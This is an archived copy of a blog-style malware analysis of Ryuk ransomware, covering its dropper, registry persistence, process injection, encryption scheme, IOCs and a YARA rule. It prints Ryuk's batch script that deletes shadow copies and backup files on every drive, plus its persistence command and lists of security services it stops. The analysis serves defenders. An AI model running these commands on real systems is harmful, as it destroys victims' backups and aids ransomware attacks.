{
	"id": "cc5ada14-f1e1-4b3c-8092-41f40312b2ad",
	"created_at": "2026-04-06T00:14:35.939049Z",
	"updated_at": "2026-04-10T03:21:22.560487Z",
	"deleted_at": null,
	"sha1_hash": "af53f197f93d93713969288b930e6c82864f911a",
	"title": "Deep Analysis of Ryuk Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 638097,
	"plain_text": "Deep Analysis of Ryuk Ransomware\r\nBy Abdallah Elshinbary\r\nPublished: 2020-05-05 · Archived: 2026-04-06 00:02:54 UTC\r\nIntroductionPermalink\r\nAttack ChainPermalink\r\nRyuk has been know to be a part of a bigger \"Triple Threat\" attack that involves Emotet and TrickBot .\r\nThe first stage of this attack is the delivery of Emotet through phishing emails that contain a weaponized word\r\ndocument, this document contains a macro code that downloads Emotet.\r\nOnce Emotet executes, it downloads another malware (usually TrickBot) which can collect system information,\r\nsteal credentials, disable AV, do lateral movement, …\r\nThe third stage of the attack is to connect to the C\u0026C server to download Ryuk which makes use of the lateral\r\nmovement done by TrickBot to infect and encrypt as many systems on the network as possible.\r\nRyuk overviewPermalink\r\nI will give a brief overview of how Ryuk operates then I will go into details in the upcoming sections.\r\nRyuk operates in two stages. The first stage is a dropper that drops the real Ryuk ransomware at another directory\r\nand exits. Then the ransomware tries to injects running processes to avoid detection. We can also see that it\r\nlaunches a cmd.exe process to modify the registry.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 1 of 13\n\nAfter that, Ryuk goes through encrypting the system files and network shares, it drops a \"Ransom Note\" at every\r\nfolder it encrypts under the name RyukReadMe.txt .\r\nEnough introduction, let’s dive into Ryuk.\r\nFirst Stage (The Dropper)Permalink\r\nSHA256: 23f8aa94ffb3c08a62735fe7fee5799880a8f322ce1d55ec49a13a3f85312db2\r\nThe dropper first checks the windows MajorVersion and if it’s equal to 5 (windows 2000 | windows XP |\r\nWindows Server 2003) , it drops the ransomware executable at C:\\Documents and Settings\\Default User\\ ,\r\notherwise it drops it at C:\\users\\Public\\ .\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 2 of 13\n\nThe name of the dropped executable is five randomly generated characters.\r\nIf the creation of this file failed, Ryuk drops the executable at the same directory of the dropper with replacing the\r\nlast character of its name with the letter ‘V’ (If the dropper name is ryuk.exe , the dropped executable will be\r\nryuV.exe ).\r\nNext we can see a call to IsWow64Process() and if it returns true (which means Ryuk is running at a 64 bit\r\nsystem), it writes the 64 bit binary to the dropped executable, else it writes the 32 bit binary. The 2 binary files are\r\nstored at the .data section.\r\nThe last step is a call to ShellExecuteW() to execute the second stage executable with passing it one argument\r\nwhich is the dropper path (This is used later to delete the dropper).\r\nSecond StagePermalink\r\nSHA256: 8b0a5fb13309623c3518473551cb1f55d38d8450129d4a3c16b476f7b2867d7d\r\nDeleting The DropperPermalink\r\nBefore the dropper exits, it passes its path to the second stage executable as a command line argument which in\r\nturn deletes the dropper.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 3 of 13\n\nPersistencePermalink\r\nRyuk uses the very well know registry key to achieve persistence, It creates a new value under the name\r\n\"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\" and its data is set to the\r\nexecutable path which in my case is \"C:\\users\\Public\\BPWPc.exe\" .\r\nHere is the full command:\r\nC:\\Windows\\System32\\cmd.exe /C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"sv\r\nPrivilege EscalationPermalink\r\nRyuk uses AdjustTokenPrivileges() function to adjust its process security access token. The requested privilege\r\nname is SeDebugPrivilege and according to Microsoft docs:\r\nSeDebugPrivilege:\r\nRequired to debug and adjust the memory of a process owned by another account. With this privilege,\r\nthe user can attach a debugger to any process or to the kernel.\r\nThis method is usually used by malware to perform process injection (which is done next).\r\nProcess InjectionPermalink\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 4 of 13\n\nRyuk goes through all running processes and stores (ProcessName, ProcessID, ProcessType) in a big array,\r\nProcessType is an integer that is set to 1 If the domain name of the user of the process starts with “NT A”\r\n(which is “NT AUTHORITY”), otherwise the ProcessType is set to 2.\r\nTo make it easier, I created a structure in IDA called ProcessInfo .\r\nAfter that, Ryuk loops through the processes’ stored data to perform the process injection.\r\nIf the process name is (csrss.exe | explorer.exe | lsaas.exe) , Ryuk ignores that process.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 5 of 13\n\nThe process injection technique used here is very simple, Ryuk allocates memory for its process at the target\r\nprocess memory space using VirtualAllocEx() , then it writes its process to that allocated memory using\r\nWriteProcessMemory() . Finally it creates a new thread using CreateRemoteThread() to run Ryuk’s thread at the\r\ninjected process.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 6 of 13\n\nBuilding ImportsPermalink\r\nRyuk imports its necessary functions dynamically using LoadLibraryA() and GetProcAdress() . The names of\r\nthe imported functions are obfuscated so static analysis won’t do very well here.\r\nWe can use a debugger to get these names rather than reversing the obfuscation algorithm.\r\nHere is the list of imported functions:\r\nExpand to see more\r\n  advapi32.dll\r\n      CryptAcquireContextW\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 7 of 13\n\nCryptDecrypt\r\n      CryptDeriveKey\r\n      CryptDestroyKey\r\n      CryptEncrypt\r\n      CryptExportKey\r\n      CryptGenKey\r\n      CryptImportKey\r\nKilling ProcessesPermalink\r\nRyuk has a long list of predefined services and processes to kill using net stop and taskkill /IM\r\nrespectively.\r\nHere is the list of services:\r\nExpand to see more\r\n    Acronis VSS Provider\r\n    Enterprise Client Service\r\n    Sophos Agent\r\n    Sophos AutoUpdate Service\r\n    Sophos Clean Service\r\n    Sophos Device Control Service\r\n    Sophos File Scanner Service\r\n    Sophos Health Service\r\n    Sophos MCS Agent\r\n    Sophos MCS Client\r\nAnd here is the list of processes:\r\nExpand to see more\r\n    zoolz.exe\r\n    agntsvc.exe\r\n    dbeng50.exe\r\n    dbsnmp.exe\r\n    encsvc.exe\r\n    excel.exe\r\n    firefoxconfig.exe\r\n    infopath.exe\r\nDeleting BackupsPermalink\r\nRyuk drops a batch script at C:\\Users\\Public\\window.bat which deletes all shadow copies and possible\r\nbackups, then the script deletes itself.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 8 of 13\n\nvssadmin Delete Shadows /all /quiet\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nvssadmin Delete Shadows /all /quiet\r\ndel /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\r\ndel /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d:\\*.dsk\r\ndel /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e:\\*.dsk\r\ndel /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f:\\*.dsk\r\ndel /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g:\\*.dsk\r\ndel /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h:\\*.dsk\r\ndel %0\r\nThe Encryption ProcessPermalink\r\nRyuk uses a multi threading approach for the encryption process, it creates a new thread for each file it encrypts\r\nwhich makes it very fast.\r\nIt starts enumerating files using FindFirstFileW() and FindNextFileW() then it passes each file name to a new\r\nencryption thread. Note that Ryuk avoids encrypting these file extensions:\r\n.dll\r\n.lnk\r\n.hrmlog\r\n.ini\r\n.exe\r\nEach encryption thread starts by generating a random 256 AES encryption key using CryptGenKey() , Ryuk\r\nutilizes the WindowsCrypto API for the encryption.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 9 of 13\n\nThen it goes into the typical encryption loop, the files are encrypted in chunks with a chunk size of 1000000\r\nbytes .\r\nFinally Ryuk write a metadata block of size 274 bytes at the end of the file. The first 6 bytes are the keyword\r\nHERMES .\r\nAfter that, The AES key is encrypted with an RSA public key before it’s written to the end of the file and then\r\nexported using CryptExportKey() , This function generates 12 bytes of Blob information + 256 bytes (the\r\nencrypted key) .\r\nThe RSA public key is embedded in the executable, it’s imported using CryptImportKey() and passed to every\r\nencryption thread.\r\nWe can see at the end of the encryption routine a check if the keyword HERMES is present at the end of the file\r\n(which indicates the file is encrypted).\r\nThis check is actually done before encrypting the file to avoid encrypting it twice.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 10 of 13\n\nHere is an example of the complete metadata block:\r\nRyuk enumerates network shares using WNetOpenEnumW() and WNetEnumResourceA() respectively.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 11 of 13\n\nFor each network resource found, the resource’s name will be appended to a list separated by a semicolon. This\r\nlist will be used later to encrypt these network shares with the same encryption process above.\r\nIOCsPermalink\r\nHashesPermalink\r\nRyuk: 8b0a5fb13309623c3518473551cb1f55d38d8450129d4a3c16b476f7b2867d7\r\nDropper: 23f8aa94ffb3c08a62735fe7fee5799880a8f322ce1d55ec49a13a3f85312db2\r\nFilesPermalink\r\nC:\\Users\\Public\\window.bat\r\nRegistryPermalink\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nEmailsPermalink\r\nWayneEvenson@protonmail[.]com\r\nWayneEvenson@tutanota[.]com\r\nYara RulePermalink\r\nrule Ryuk\r\n{\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 12 of 13\n\nmeta:\r\n author = \"N1ght-W0lf\"\r\n description = \"Detect Ryuk Samples\"\r\n date = \"2020-05-08\"\r\n strings:\r\n $s1 = \"RyukReadMe.txt\" ascii wide\r\n $s2 = \"No system is safe\" ascii wide\r\n $s3 = \"svchos\" ascii wide fullword\r\n $s4 = \"vssadmin Delete Shadows /all /quiet\" ascii wide\r\n $s5 = \"UNIQUE_ID_DO_NOT_REMOVE\" ascii wide\r\n $s7 = \"\\\\users\\\\Public\\\\window.bat\" ascii wide\r\n $s6 = \"HERMES\" ascii wide\r\n condition:\r\n 5 of them\r\n}\r\nExternal ReferencesPermalink\r\nhttps://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/\r\nhttps://research.checkpoint.com/2018/ryuk-ransomware-targeted-campaign-break/\r\nhttps://app.any.run/tasks/81eaa3cf-eb75-411f-adba-b09472927155/\r\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672\r\nhttps://www.codeproject.com/Articles/1658/Obtain-the-plain-text-session-key-using-CryptoAPI\r\nSource: https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/"
	],
	"report_names": [
		"ryuk-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434475,
	"ts_updated_at": 1775791282,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/af53f197f93d93713969288b930e6c82864f911a.pdf",
		"text": "https://archive.orkl.eu/af53f197f93d93713969288b930e6c82864f911a.txt",
		"img": "https://archive.orkl.eu/af53f197f93d93713969288b930e6c82864f911a.jpg"
	}
}